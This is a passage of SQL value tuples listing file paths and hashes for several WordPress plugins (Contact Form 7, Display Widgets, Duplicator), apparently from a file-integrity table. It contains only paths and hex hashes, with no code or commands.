(0x2015bd5ee91471aa007f4bff998554c7, 'wp-content/plugins/contact-form-7/languages/wpcf7-cs_CZ.mo', 1, 0x00000000000000000000000000000000, 0xd289cdb9ace3c4facb05b07652cbfa0a),
(0xd84037ba1a9f131e3af95850d64a0d79, 'wp-content/plugins/contact-form-7/languages/wpcf7-da_DK.mo', 1, 0x00000000000000000000000000000000, 0x9b3ed1565ad222a3ba2fdb6d722d6702),
(0x750775bef7ea4535ff8a457aeb0b1bbe, 'wp-content/plugins/contact-form-7/languages/wpcf7-de_DE.mo', 1, 0x00000000000000000000000000000000, 0x2dfc77d694b2c7c891434ba1b5d57fd4),
(0xca5c0fa6e6f94ba3b0cab0cc33740a3b, 'wp-content/plugins/contact-form-7/languages/wpcf7-el.mo', 1, 0x00000000000000000000000000000000, 0x324401f1c39894bdaa9ec237b14a058e),
(0x1aa7c19f0d16765eb93b93676cbff9fa, 'wp-content/plugins/contact-form-7/languages/wpcf7-eo_EO.mo', 1, 0x00000000000000000000000000000000, 0xd1ec1cdfbace96a92a8a7eb72bb71058),
(0xc395982982cc9687964f43c023f2bc5d, 'wp-content/plugins/contact-form-7/languages/wpcf7-es_ES.mo', 1, 0x00000000000000000000000000000000, 0xa099af4f8562300c3053b3f735b210ae),
(0xf6736bf5a7b555a19e608bf75224c140, 'wp-content/plugins/contact-form-7/languages/wpcf7-et.mo', 1, 0x00000000000000000000000000000000, 0x98a5351554f2c8fc9149034eb9a95a3b),
(0x72e35d0aeeee7350b9f965c69bb6d8c2, 'wp-content/plugins/contact-form-7/languages/wpcf7-eu.mo', 1, 0x00000000000000000000000000000000, 0xd95d2c5ca945f169342670b920417bcc),
(0xe77912c253e8416f25afd917df1a9b0e, 'wp-content/plugins/contact-form-7/languages/wpcf7-fa_IR.mo', 1, 0x00000000000000000000000000000000, 0x215818d356efc5a748201c1d84686c02),
(0x60dcb07c2af83c2c4cbf955f811dee48, 'wp-content/plugins/contact-form-7/languages/wpcf7-fi.mo', 1, 0x00000000000000000000000000000000, 0x92cc5fe00aeab21655c3efa24d2a60b8),
(0x2f4772f09dc384a4ee5396000a8e0559, 'wp-content/plugins/contact-form-7/languages/wpcf7-fr_FR.mo', 1, 0x00000000000000000000000000000000, 0x0599800dda4e902dcb615585ba9d9045),
(0x16dc82e5b625ba00702a62615a489b98, 'wp-content/plugins/contact-form-7/languages/wpcf7-ga_IE.mo', 1, 0x00000000000000000000000000000000, 0xccb22d5c0e099f2db993975bf47a65be),
(0x4a10f25ad4122676211db7ce7eb268af, 'wp-content/plugins/contact-form-7/languages/wpcf7-gl_ES.mo', 1, 0x00000000000000000000000000000000, 0x80b3203ca5a8cd3836da4c4021e00987),
(0xaf18f310e1d88ef5dde645989089acee, 'wp-content/plugins/contact-form-7/languages/wpcf7-gu_IN.mo', 1, 0x00000000000000000000000000000000, 0x90ea94f8609690f482bd47eb0b43286f),
(0x25cbc8146f8699b006b30ac583bc2978, 'wp-content/plugins/contact-form-7/languages/wpcf7-he_IL.mo', 1, 0x00000000000000000000000000000000, 0x856e2a2f2dcb6ed0dd60e47d2bd0bf15),
(0x521260f65bb0653f3242e7e2a87b9498, 'wp-content/plugins/contact-form-7/languages/wpcf7-hi_IN.mo', 1, 0x00000000000000000000000000000000, 0xe87618943b003cb13a8d694772d7ec63),
(0x2e0114ff651499efd4dd9d8e1c0977a3, 'wp-content/plugins/contact-form-7/languages/wpcf7-hr.mo', 1, 0x00000000000000000000000000000000, 0xe43e73d6a6c55525a23f435175dd3be6),
(0x50ca21934289d3012347dd7f61129cbb, 'wp-content/plugins/contact-form-7/languages/wpcf7-hu_HU.mo', 1, 0x00000000000000000000000000000000, 0x1a6f2538661b85c0e5ee7fc940e3afe3),
(0xcad544cdeda34308026a230831118afb, 'wp-content/plugins/contact-form-7/languages/wpcf7-hy_AM.mo', 1, 0x00000000000000000000000000000000, 0x671e1fb351cfbc541d8d75db6b251e40),
(0x5c90b20fcb987518a85685fc891b9cc2, 'wp-content/plugins/contact-form-7/languages/wpcf7-id_ID.mo', 1, 0x00000000000000000000000000000000, 0x926e1fb9693f3f0267548249272961a7),
(0x9a992c829dcb7d07eeaa17cc910414bc, 'wp-content/plugins/contact-form-7/languages/wpcf7-it_IT.mo', 1, 0x00000000000000000000000000000000, 0x9bf83d19ae822d077d56d98bc6edc1e9),
(0xedea0a2fc932720ff9128cb79a29b566, 'wp-content/plugins/contact-form-7/languages/wpcf7-ja.mo', 1, 0x00000000000000000000000000000000, 0xfeebb60bdc398e9962a2efb3fbb6e268),
(0xa8b06fd5b3143f7b4005a48593627a8d, 'wp-content/plugins/contact-form-7/languages/wpcf7-ka_GE.mo', 1, 0x00000000000000000000000000000000, 0x168c710276cd527cc83127d160728efe),
(0x7507237af80a5f4dffcb9a0327740adf, 'wp-content/plugins/contact-form-7/languages/wpcf7-ko_KR.mo', 1, 0x00000000000000000000000000000000, 0xb48ac45a6aa67b55bda70aa217b05ce9),
(0x7538900cfe3fb3a8662abd520ae2c8c8, 'wp-content/plugins/contact-form-7/languages/wpcf7-lt_LT.mo', 1, 0x00000000000000000000000000000000, 0xbf248aed1ea3c6d885a3ecd957a004ac),
(0x72d25cd34b8fd49b9bda34633d34aacd, 'wp-content/plugins/contact-form-7/languages/wpcf7-lv.mo', 1, 0x00000000000000000000000000000000, 0xb1e0782bd88da1b7dfaf9c28fb615618),
(0xc926e4c0eb23da18d2420496b1d18b03, 'wp-content/plugins/contact-form-7/languages/wpcf7-mk_MK.mo', 1, 0x00000000000000000000000000000000, 0xa99b18318a91213cefac5abb25b55e55),
(0x3f1b4d330fce46edfeff9bd755277e53, 'wp-content/plugins/contact-form-7/languages/wpcf7-ml_IN.mo', 1, 0x00000000000000000000000000000000, 0x2eb2a6ec77620960a6c8127bb093af2c),
(0xcdbc25bf945f45711151dbd0f26c997b, 'wp-content/plugins/contact-form-7/languages/wpcf7-ms_MY.mo', 1, 0x00000000000000000000000000000000, 0xf3920fac0590308c6debe186a1ee7a77),
(0x5af1d2e030873f04c0cfcd8afd652a30, 'wp-content/plugins/contact-form-7/languages/wpcf7-mt_MT.mo', 1, 0x00000000000000000000000000000000, 0x69c3211182c6b5ddab48d67f8cbf58c2),
(0x54f174f7e489ff0f936a6c520c8ff183, 'wp-content/plugins/contact-form-7/languages/wpcf7-nb_NO.mo', 1, 0x00000000000000000000000000000000, 0xb66739ffe7d7a0d3dd4a95f61177dec2),
(0x30400348a3d58d0b0d5a83bce2109378, 'wp-content/plugins/contact-form-7/languages/wpcf7-nl_NL.mo', 1, 0x00000000000000000000000000000000, 0xe1267911732eaf6dc420d9afe1c9d34e),
(0xd3a87a0b2779554ee2d46e40b53b77ef, 'wp-content/plugins/contact-form-7/languages/wpcf7-pl_PL.mo', 1, 0x00000000000000000000000000000000, 0x80215d816b20cd1d0b1fe1b7e15240f8),
(0x79f9f62f685cbab5dcb672539964324a, 'wp-content/plugins/contact-form-7/languages/wpcf7-pt_BR.mo', 1, 0x00000000000000000000000000000000, 0x66042af99778dc358d0367723833baae),
(0x50a0f735de096114b634da02bc067611, 'wp-content/plugins/contact-form-7/languages/wpcf7-pt_PT.mo', 1, 0x00000000000000000000000000000000, 0x2b179846d8e1bde0a1eca7f60f402b57),
(0xf2c47a9684022e1578b0716c4c13c98b, 'wp-content/plugins/contact-form-7/languages/wpcf7-ro_RO.mo', 1, 0x00000000000000000000000000000000, 0x54860f16afab7b8dbcbe08689e2a6db0),
(0xaa5f83f4f30dca07fc1c518d4868fc87, 'wp-content/plugins/contact-form-7/languages/wpcf7-ru_RU.mo', 1, 0x00000000000000000000000000000000, 0x45fe6fb13c1b9cd4ee1d9144bd6aebc9),
(0x74ba9f4fce337658ef553eeef51b530b, 'wp-content/plugins/contact-form-7/languages/wpcf7-si_LK.mo', 1, 0x00000000000000000000000000000000, 0xb14920a2ac3a10b377f99bcc35e6dabf),
(0xf0a5fb3538db3ff197671b3b0e8877ca, 'wp-content/plugins/contact-form-7/languages/wpcf7-sk_SK.mo', 1, 0x00000000000000000000000000000000, 0xd9131a6ad66e50002aad8486df7e1c26),
(0xc4cbaf52e711be26d4955c2bf8c4e871, 'wp-content/plugins/contact-form-7/languages/wpcf7-sl_SI.mo', 1, 0x00000000000000000000000000000000, 0x08b1113b4433b61ba1537f9388030fbf),
(0xc1b40d15a3dda727012e0eece748cc8e, 'wp-content/plugins/contact-form-7/languages/wpcf7-sq.mo', 1, 0x00000000000000000000000000000000, 0x2eb62c98bb72d6fecd9c16ff7cd381c7),
(0xacb0275b6cf69f8afd30e6be7ab6dab0, 'wp-content/plugins/contact-form-7/languages/wpcf7-sr_RS.mo', 1, 0x00000000000000000000000000000000, 0x5465955d16f1b65c49b68f63aa36cbe1),
(0x75ec990a8f4e7c450c7e514b95542e11, 'wp-content/plugins/contact-form-7/languages/wpcf7-sv_SE.mo', 1, 0x00000000000000000000000000000000, 0xecde8d6def6a48e7abd494aea7443554),
(0x1c3995dfa50ca86dea26ad696a5f781a, 'wp-content/plugins/contact-form-7/languages/wpcf7-ta.mo', 1, 0x00000000000000000000000000000000, 0xfb20bae56796b982d218cb2f355542e8),
(0x731b4cb980d3f1b8ed86be8f61e5a862, 'wp-content/plugins/contact-form-7/languages/wpcf7-th.mo', 1, 0x00000000000000000000000000000000, 0xffcd580ea4151a3055274056e6ed346a),
(0x520a0b8902ca9fb5b6313ac788108db9, 'wp-content/plugins/contact-form-7/languages/wpcf7-tl.mo', 1, 0x00000000000000000000000000000000, 0xe35dbf58ed7264e89b1402676eab8e08),
(0xc01600d5d9c4ad7e8a577c04e18e854c, 'wp-content/plugins/contact-form-7/languages/wpcf7-tr_TR.mo', 1, 0x00000000000000000000000000000000, 0x3d8bedcd7b4cbde5350c7bffd177c5af),
(0x452e608dd72ef42478013bfe9dbf54c2, 'wp-content/plugins/contact-form-7/languages/wpcf7-uk.mo', 1, 0x00000000000000000000000000000000, 0x4a5c3fa810fda8ac334c68aba6e2711b),
(0x482df31e8ac62dcdbb0a8fb0c0f8fd9c, 'wp-content/plugins/contact-form-7/languages/wpcf7-vi.mo', 1, 0x00000000000000000000000000000000, 0x8577d8a5c332f410f2f1b72a5f79afde),
(0x168081af00ee4275906c12cd3e4e9077, 'wp-content/plugins/contact-form-7/languages/wpcf7-zh_CN.mo', 1, 0x00000000000000000000000000000000, 0xaf11a00be57ad44fe14728205b5f28d0),
(0xf9572c5eec8ebcd24a01577be18f00c1, 'wp-content/plugins/contact-form-7/languages/wpcf7-zh_TW.mo', 1, 0x00000000000000000000000000000000, 0x765c364a9267baf14f74c5adbcf8d6e2),
(0xf1730aa54b5fc76af15009c7be7e8ac9, 'wp-content/plugins/contact-form-7/languages/wpcf7.pot', 1, 0x00000000000000000000000000000000, 0x6e1562d30c2357c2d5209586e2a61a1d),
(0xdd8bbc726e7da77ab90ce47727e91d08, 'wp-content/plugins/contact-form-7/license.txt', 1, 0x00000000000000000000000000000000, 0xb234ee4d69f5fce4486a80fdaf4a4263),
(0x8061c4c8046e46682023db88f58df1bc, 'wp-content/plugins/contact-form-7/modules/acceptance.php', 1, 0x00000000000000000000000000000000, 0x34b733de7b73ce697e8f9464dfe542dc),
(0xecc6bfad8ef995e66fee8d46d76894e3, 'wp-content/plugins/contact-form-7/modules/akismet.php', 1, 0x00000000000000000000000000000000, 0x5e62a1795505dd4ae1a582e8a49efaa4),
(0x9fd32e3aa5fd27ccf6f5dd3ce7f97176, 'wp-content/plugins/contact-form-7/modules/captcha.php', 1, 0x00000000000000000000000000000000, 0x75ce6576e7b0d4dab5cf56780128466c),
(0x0d766bbd502dc8748db8479aa5a6486d, 'wp-content/plugins/contact-form-7/modules/checkbox.php', 1, 0x00000000000000000000000000000000, 0x47e02026776ad44ab112da7e12847ff6),
(0x0013df4075189ca59c3205b6ee58e7b6, 'wp-content/plugins/contact-form-7/modules/date.php', 1, 0x00000000000000000000000000000000, 0xcc255e6f97aa4e96512c89bfc7d00dfb),
(0x1214594945f9e25474324cd5181ee85d, 'wp-content/plugins/contact-form-7/modules/file.php', 1, 0x00000000000000000000000000000000, 0x42be2a9a598e523b400219b6da21da8b),
(0x7802f33ed31c9de6455cb095513b9a5c, 'wp-content/plugins/contact-form-7/modules/flamingo.php', 1, 0x00000000000000000000000000000000, 0x64c7cedc5714870e69bee33aa3acfdcf),
(0x61bd54f2edf452456d0573217975bc3a, 'wp-content/plugins/contact-form-7/modules/jetpack.php', 1, 0x00000000000000000000000000000000, 0x309a8da7b704dc9005b91167f9eb0eab),
(0x6b09bba7da3ced992847da77f4db1682, 'wp-content/plugins/contact-form-7/modules/number.php', 1, 0x00000000000000000000000000000000, 0x689cc8a16e96e2f4a52486312957e28d),
(0xc345858a65e4225e16b8fa7a54ee89c7, 'wp-content/plugins/contact-form-7/modules/quiz.php', 1, 0x00000000000000000000000000000000, 0x29944c76b1c7d94d67e0ff3babdce384),
(0x5c0af13b3ac649d122ef40ef4f68c915, 'wp-content/plugins/contact-form-7/modules/response.php', 1, 0x00000000000000000000000000000000, 0xcdc9422174c283e89423ecda50d7a02f),
(0xddba243b6bd9c24a95098f61806c31a3, 'wp-content/plugins/contact-form-7/modules/select.php', 1, 0x00000000000000000000000000000000, 0x840b38b7ee7cb8f2c8e310b7a094e24c),
(0xb0869305565b252795fdb3f1c5be99ce, 'wp-content/plugins/contact-form-7/modules/special-mail-tags.php', 1, 0x00000000000000000000000000000000, 0xf12a62f635d11c491d74bb1de7c2bd19),
(0x4a3ff8ab34ad598b9568890b65213e4f, 'wp-content/plugins/contact-form-7/modules/submit.php', 1, 0x00000000000000000000000000000000, 0xa509a33d2e52704c93bfa9128b0d1054),
(0x1b62c7084e3dbfb010a82cc0c653ede0, 'wp-content/plugins/contact-form-7/modules/text.php', 1, 0x00000000000000000000000000000000, 0x05f823658546bb08c755ba4a8012a67a),
(0xfd72b022b72da500a04598770289a258, 'wp-content/plugins/contact-form-7/modules/textarea.php', 1, 0x00000000000000000000000000000000, 0x4c4825afd781b0e35f0aabd46b0adecf),
(0xa4a18318366f38188a86a54e0c6f4c3b, 'wp-content/plugins/contact-form-7/readme.txt', 1, 0x00000000000000000000000000000000, 0xe0f3aa5d99f0ebf28184ede3422e40e2),
(0xa025df260be0bfc50c7d701d5c3fdb81, 'wp-content/plugins/contact-form-7/settings.php', 1, 0x00000000000000000000000000000000, 0xaaaa78c2ff882864deed17f3969e1081),
(0x0de2afc2b6324f93de328187fa26a640, 'wp-content/plugins/contact-form-7/uninstall.php', 1, 0x00000000000000000000000000000000, 0x61be2af9e9463a04d3140773e39e7bee),
(0x6b4e98eb286cab5a669d8445224c6dc9, 'wp-content/plugins/contact-form-7/wp-contact-form-7.php', 1, 0x00000000000000000000000000000000, 0x0bc57d68b9a2773d058c97bb56d71d6b),
(0xe44837ce5a031f093189c0ae051ccee1, 'wp-content/plugins/display-widgets/display-widgets.php', 1, 0x00000000000000000000000000000000, 0x1e26acd99443dfc22d49cc7ecd713ffd),
(0xedc64f110228bda43b0587012a24e279, 'wp-content/plugins/display-widgets/languages/display-widgets-TL.mo', 1, 0x00000000000000000000000000000000, 0x5bc5e4afe91da5e03c481df3f5788eb7),
(0x58f54b10632ba7f02e15bdda78e6a82f, 'wp-content/plugins/display-widgets/languages/display-widgets-TL.po', 1, 0x00000000000000000000000000000000, 0xabf125fd7ad42b119a1b63bb5d4be620),
(0x1f2513e49725bc43dddecb68db85a031, 'wp-content/plugins/display-widgets/languages/display-widgets-bm_MY.mo', 1, 0x00000000000000000000000000000000, 0xe8ebf8a2c064160359f65e403f8bf4c9),
(0xc9e27a719d3eff452311ab062904792b, 'wp-content/plugins/display-widgets/languages/display-widgets-bm_MY.po', 1, 0x00000000000000000000000000000000, 0x59af1adc536690cf609ad73226d8fd2f),
(0xb407ecb4840319b0cad6d801e54c537a, 'wp-content/plugins/display-widgets/languages/display-widgets-de_DE.mo', 1, 0x00000000000000000000000000000000, 0x3b72c1d8ed76a2dd8d2c22d7d3b1de65),
(0xf868c03b44d4b6b0727974b2571ab396, 'wp-content/plugins/display-widgets/languages/display-widgets-de_DE.po', 1, 0x00000000000000000000000000000000, 0x2c216331407657d09280320e3f7aa44f),
(0x0b7b820a6de044d864f853dda4e5231e, 'wp-content/plugins/display-widgets/languages/display-widgets-en_US.po', 1, 0x00000000000000000000000000000000, 0x3f66e78a03caf1ef0bf4ebe90e820862),
(0x998c6c96365407ebb4dd6f990fbc83c3, 'wp-content/plugins/display-widgets/languages/display-widgets-es_ES.mo', 1, 0x00000000000000000000000000000000, 0x744995620e349ec280c52e9bd371476d),
(0x979eb3ee724cda45470df78b0bbafa34, 'wp-content/plugins/display-widgets/languages/display-widgets-es_ES.po', 1, 0x00000000000000000000000000000000, 0x1c0cb520bdcfa49b11f26dc642020f47),
(0x01220cefca3ed8cd0606c561fb9f009c, 'wp-content/plugins/display-widgets/languages/display-widgets-fr_FR.mo', 1, 0x00000000000000000000000000000000, 0xe56bae12ba940101b6fe029ffc4311df),
(0x55a4516aa93311408ffd975aad206d45, 'wp-content/plugins/display-widgets/languages/display-widgets-fr_FR.po', 1, 0x00000000000000000000000000000000, 0xfe6047602fa2066a9e457b56ee570a84),
(0xd2b273354b78b78260bf39a53603e359, 'wp-content/plugins/display-widgets/languages/display-widgets-he_IL.mo', 1, 0x00000000000000000000000000000000, 0x7dda9e9e065211a4d3ef5fe00c20634d),
(0x03531d6c3ab021fa1a455e8d08c914bc, 'wp-content/plugins/display-widgets/languages/display-widgets-he_IL.po', 1, 0x00000000000000000000000000000000, 0x717ad8e19f5860fd21776d97429945f5),
(0x5ff0ef8e25b442e93271af3644e94cee, 'wp-content/plugins/display-widgets/languages/display-widgets-ja.mo', 1, 0x00000000000000000000000000000000, 0x5a07571d63fb519fd162c6e1753ce305),
(0x53487c4a2a242acba4004f9532ac1b03, 'wp-content/plugins/display-widgets/languages/display-widgets-ja.po', 1, 0x00000000000000000000000000000000, 0x0623039c76a00551b4bc29a77c1fb08a),
(0x17f511c957c100df8c6babe99b684e2e, 'wp-content/plugins/display-widgets/languages/display-widgets-nl_NL.mo', 1, 0x00000000000000000000000000000000, 0x37855949d4658c1b2a6e34c21b7193c7),
(0xa26fc0b430df1f887dabe8edf6bf2c4b, 'wp-content/plugins/display-widgets/languages/display-widgets-nl_NL.po', 1, 0x00000000000000000000000000000000, 0x77c1222d9476111d31c71a1094b2388e),
(0x860515e67449ae86389f8e97e277ad35, 'wp-content/plugins/display-widgets/languages/display-widgets-pl_PL.mo', 1, 0x00000000000000000000000000000000, 0x4b3d18f834416a0fba492da788770cfe),
(0x82ea53b9b9031bd880220473f203c18c, 'wp-content/plugins/display-widgets/languages/display-widgets-pl_PL.po', 1, 0x00000000000000000000000000000000, 0x078a6e56c200419442eb53e99222afaf),
(0xce6ceb25243e54bdc9d7b2134ff69395, 'wp-content/plugins/display-widgets/languages/display-widgets-ro_RO.mo', 1, 0x00000000000000000000000000000000, 0x3fba61cea85a9ed4e2864ecd4cd0d53a),
(0x23b8d75246b7bade76c442fc3348e7b2, 'wp-content/plugins/display-widgets/languages/display-widgets-ro_RO.po', 1, 0x00000000000000000000000000000000, 0xc9d5cff1bef1358a34345355e94ca165),
(0x1087901594831aef045b5c5d473e140b, 'wp-content/plugins/display-widgets/languages/display-widgets-ru_RU.mo', 1, 0x00000000000000000000000000000000, 0x72dc9b50c4d8952fe5edbca09387575a),
(0x254cc33dc5a12128aef66160d6e31831, 'wp-content/plugins/display-widgets/languages/display-widgets-ru_RU.po', 1, 0x00000000000000000000000000000000, 0x3d0e316af47349e3130248390d89062c),
(0x36cf3e8aa59c51cddc111b271348c600, 'wp-content/plugins/display-widgets/languages/display-widgets-sq_AL.mo', 1, 0x00000000000000000000000000000000, 0xf8e8d72c2f93d298fe2e28ce7f351526),
(0x4ef520f6214cc9b78cfb61b5a0d0733d, 'wp-content/plugins/display-widgets/languages/display-widgets-sq_AL.po', 1, 0x00000000000000000000000000000000, 0xa69058f5f655969dd513e1e3e05b23d7),
(0xc1be8668df365705902c0db2f15120db, 'wp-content/plugins/display-widgets/languages/display-widgets-zh_CN.mo', 1, 0x00000000000000000000000000000000, 0x43c6becb83197d315d4d6f94b7be5b82),
(0x3a40586b27521e75b99aa58cf7bcb29c, 'wp-content/plugins/display-widgets/languages/display-widgets-zh_CN.po', 1, 0x00000000000000000000000000000000, 0xd60ce8bf2d93e50ee3bb84b11d7bb0a4),
(0xc233826b186682af50053cad70408476, 'wp-content/plugins/display-widgets/readme.txt', 1, 0x00000000000000000000000000000000, 0x56b7358dbec8e538abdf387e855a1402),
(0xc64e195823c0fd0a272f9b8ccbb4184c, 'wp-content/plugins/display-widgets/screenshot-1.png', 1, 0x00000000000000000000000000000000, 0xcea330d505e3b86ade7932d1f2105e03),
(0x8ff7311e03fe7b9761caff0cd12cb9a0, 'wp-content/plugins/duplicator/assets/css/font-awesome.min.css', 1, 0x00000000000000000000000000000000, 0xaede50e4be8da8450a046f9d293e57a5),
(0x0d72c7b569a701f30d3275bc31cd9324, 'wp-content/plugins/duplicator/assets/css/images/ui-bg_flat_0_aaaaaa_40x100.png', 1, 0x00000000000000000000000000000000, 0x2a44fbdb7360c60122bcf6dcef0387d8),
(0xd8e6d290446fbdd03d28e1b953f07b66, 'wp-content/plugins/duplicator/assets/css/images/ui-bg_flat_75_ffffff_40x100.png', 1, 0x00000000000000000000000000000000, 0x8692e6efddf882acbff144c38ea7dfdf),
(0xb3d51ef039e438cda4abebf546fa2477, 'wp-content/plugins/duplicator/assets/css/images/ui-bg_glass_55_fbf9ee_1x400.png', 1, 0x00000000000000000000000000000000, 0xf8f4558e0b92ff2cd6136781533902ec),
(0xa9f2da50cc08fef278aeaa9f0b0ea25f, 'wp-content/plugins/duplicator/assets/css/images/ui-bg_glass_65_ffffff_1x400.png', 1, 0x00000000000000000000000000000000, 0xe5a8f32e28fd5c27bf0fed33c8a8b9b5),
(0xa9080c96e42391d6fd9fe71f47aadb05, 'wp-content/plugins/duplicator/assets/css/images/ui-bg_glass_75_dadada_1x400.png', 1, 0x00000000000000000000000000000000, 0xc12c6510dad3ebfa64c8a30e959a2469),
(0x0ecfcb4b52f23cc382f1a88581528e42, 'wp-content/plugins/duplicator/assets/css/images/ui-bg_glass_75_e6e6e6_1x400.png', 1, 0x00000000000000000000000000000000, 0xf4254356c2a8c9a383205ef2c4de22c4),
(0x8c4f4e35859a64baeaddb9d7fa20d2c9, 'wp-content/plugins/duplicator/assets/css/images/ui-bg_glass_95_fef1ec_1x400.png', 1, 0x00000000000000000000000000000000, 0xfb99b0d4d2f0b82a6fa65deeef120163),
(0x512eae8fc5455879faff3c8bc9805cb0, 'wp-content/plugins/duplicator/assets/css/images/ui-bg_highlight-soft_75_cccccc_1x100.png', 1, 0x00000000000000000000000000000000, 0x72c593d16e998952cd8d798fee33c6f3),
(0x8e8c11e101d51d17c99cbc11478ac226, 'wp-content/plugins/duplicator/assets/css/images/ui-icons_222222_256x240.png', 1, 0x00000000000000000000000000000000, 0xebe6b6902a408fbf9cac6379a1477525),
(0x65b2f991fbcaf72af36921c565cd5a03, 'wp-content/plugins/duplicator/assets/css/images/ui-icons_2e83ff_256x240.png', 1, 0x00000000000000000000000000000000, 0x6e7a87edf112d7544015589f8291e752),
(0x74d3c478942ad66edd981c26d892f582, 'wp-content/plugins/duplicator/assets/css/images/ui-icons_454545_256x240.png', 1, 0x00000000000000000000000000000000, 0x119dd0c2e94ad689de873ef39fd43e6e),
(0x181ba438aa24e55d9b38be7f45d93906, 'wp-content/plugins/duplicator/assets/css/images/ui-icons_888888_256x240.png', 1, 0x00000000000000000000000000000000, 0x9c46d7cab43e22a14bad26d2d4806d80),
(0xa221a99c9348e0164d31bf901c823ced, 'wp-content/plugins/duplicator/assets/css/images/ui-icons_cd0a0a_256x240.png', 1, 0x00000000000000000000000000000000, 0x3e450c2a2c66328d9498e7001ad7197c),
(0x1f2f0e29735c3b523f56376f1ff38f33, 'wp-content/plugins/duplicator/assets/css/jquery-ui.css', 1, 0x00000000000000000000000000000000, 0xa4670525d5133a3db3cab91742425d1c),
(0xca3042cb235b774975a9ce95b7e4d304, 'wp-content/plugins/duplicator/assets/css/style.css', 1, 0x00000000000000000000000000000000, 0x272baae46b545aec857611dae55da856),
(0x4d2879cc0b837c5c3d1d9d4417260af4, 'wp-content/plugins/duplicator/assets/fonts/FontAwesome.otf', 1, 0x00000000000000000000000000000000, 0x3b15120c304688379525c9f3c15cc4c2),
(0xfa63102558e37e35e25ce2e1065c65a4, 'wp-content/plugins/duplicator/assets/fonts/fontawesome-webfont.eot', 1, 0x00000000000000000000000000000000, 0x90186830c9c50a0fed932494581761d9),
(0xec8fec450064ce3c261fadbe0ef416ba, 'wp-content/plugins/duplicator/assets/fonts/fontawesome-webfont.svg', 1, 0x00000000000000000000000000000000, 0xdc89f84240347782f3a88e9f4d2d62e7),
(0x3de9ddb264203e536d5b8f30c1f81bb7, 'wp-content/plugins/duplicator/assets/fonts/fontawesome-webfont.ttf', 1, 0x00000000000000000000000000000000, 0x4f0022f25672c7f501c339cbf98d9117),
(0x52570c3e30bb1ee0bbbc609478b77a70, 'wp-content/plugins/duplicator/assets/fonts/fontawesome-webfont.woff', 1, 0x00000000000000000000000000000000, 0xfdf491ce5ff5b2da02708cd0e9864719),
(0x63a88b72aa68ffbe3a903bd2cee65c5b, 'wp-content/plugins/duplicator/assets/img/5star.png', 1, 0x00000000000000000000000000000000, 0x8a0e48988c8ea5d6607ce39752e12a28),
(0x0cc81d89b94293c3b78ec5d1ecd66350, 'wp-content/plugins/duplicator/assets/img/create.png', 1, 0x00000000000000000000000000000000, 0xbb45c8ccf38cb86875cf8d3534529b0b),
(0x1048a2196a9279825caf38e3a3bdaa4e, 'wp-content/plugins/duplicator/assets/img/hdivider.png', 1, 0x00000000000000000000000000000000, 0xd93d7ce951a6145db510ddfcd601e803),
(0x35a2c3146794969de8c19f018827c85b, 'wp-content/plugins/duplicator/assets/img/logo-box.png', 1, 0x00000000000000000000000000000000, 0x535104617eb4ee4f7fa89be2bb9f8a67),
(0x764b3928f29581d23c8fe461c4d4c553, 'wp-content/plugins/duplicator/assets/img/logo.png', 1, 0x00000000000000000000000000000000, 0xfd1744ce04ec5c6523a9ffb8458becfe),
(0x593f392323314487a761dfc8a3f46f3a, 'wp-content/plugins/duplicator/assets/img/paypal.png', 1, 0x00000000000000000000000000000000, 0xfe953cc8f80d353b44733ffb911eba0a),
(0xfa576187e772f75e51cda40b2471f935, 'wp-content/plugins/duplicator/assets/js/parsley-standalone.min.js', 1, 0x00000000000000000000000000000000, 0x851d74cc118c0bf055e7b75054441392),
(0x7e20af35bf6e58a227d975f1747f65ee, 'wp-content/plugins/duplicator/classes/logging.php', 1, 0x00000000000000000000000000000000, 0xfcc2a6e7390f8379c8555498dd3ab223),
(0x4ae06855fa607c0047ff297e27f0c40b, 'wp-content/plugins/duplicator/classes/package.archive.php', 1, 0x00000000000000000000000000000000, 0x000f4f37cda0609e355aa5e35c2233a8),
(0x4c804e39b032c29c18961a68ff798be8, 'wp-content/plugins/duplicator/classes/package.archive.zip.php', 1, 0x00000000000000000000000000000000, 0x1e51293d23e38a3ac4b91a1d0e3a3b5f),
(0x27a7d9f987522a1ee5a5f6e403f1104f, 'wp-content/plugins/duplicator/classes/package.database.php', 1, 0x00000000000000000000000000000000, 0xd1f2ee27e86fcad71e5bd62468aa3121),
(0x56a2bca9ca784a3a663ab2c4804e9f39, 'wp-content/plugins/duplicator/classes/package.installer.php', 1, 0x00000000000000000000000000000000, 0xf66d28565d5913443c22a08aedd36b0a),
(0x886d17c1166dcc5cbe54f75ff76f6e33, 'wp-content/plugins/duplicator/classes/package.php', 1, 0x00000000000000000000000000000000, 0xfb20ff77792b09042a9e5c2503129743),
(0x94d6ab3d39ab6a0b56dced6f637932e5, 'wp-content/plugins/duplicator/classes/server.php', 1, 0x00000000000000000000000000000000, 0xa9a2be3ee447943779f98a57e8b37275),
(0xbc961c8b506cac54d91ee3cd46afed59, 'wp-content/plugins/duplicator/classes/settings.php', 1, 0x00000000000000000000000000000000, 0x04ab433545e719340f90158ceb0b8729),
(0x9f1f4f825cb26f6b6308292f4a7e201a, 'wp-content/plugins/duplicator/classes/ui.php', 1, 0x00000000000000000000000000000000, 0x42c9ceae093ef7d18e207196977ea672),
(0xd9c6d6a8a2b0fa15e9fd0805eaee0b35, 'wp-content/plugins/duplicator/classes/utility.php', 1, 0x00000000000000000000000000000000, 0xcfe31384b8155a0a63b18b19c6272999),
(0xb493278de7ed4ade2d610c78c03f92d4, 'wp-content/plugins/duplicator/define.php', 1, 0x00000000000000000000000000000000, 0xe6019c33165987a597db896596a1d6cc),
(0x2630975e1e15aedb1fa018475994132d, 'wp-content/plugins/duplicator/duplicator.php', 1, 0x00000000000000000000000000000000, 0xe3383c8918e7b4f7d93bf1bef75c2051),
(0x79dff3160e4328fdee04e0b8e2235470, 'wp-content/plugins/duplicator/installer/build/ajax.step1.php', 1, 0x00000000000000000000000000000000, 0xeb947db1767b11e1b017e3eb92f3cb78),
(0xdad0a04c0cc86a511fa544088197c49e, 'wp-content/plugins/duplicator/installer/build/ajax.step2.php', 1, 0x00000000000000000000000000000000, 0x74027d2427e6dbc5a22cc432e3e01028),
(0x5ffce69fa3b391ad434be9999ceb5b30, 'wp-content/plugins/duplicator/installer/build/assets/inc.css.php', 1, 0x00000000000000000000000000000000, 0x8b8230ccf5984c6d8f51302c6cec5b2f),
(0xfd1184b2530bc06076dfac5e37401cf1, 'wp-content/plugins/duplicator/installer/build/assets/inc.js.php', 1, 0x00000000000000000000000000000000, 0xaaedb71fff8b98927e75e517f43e87d4),
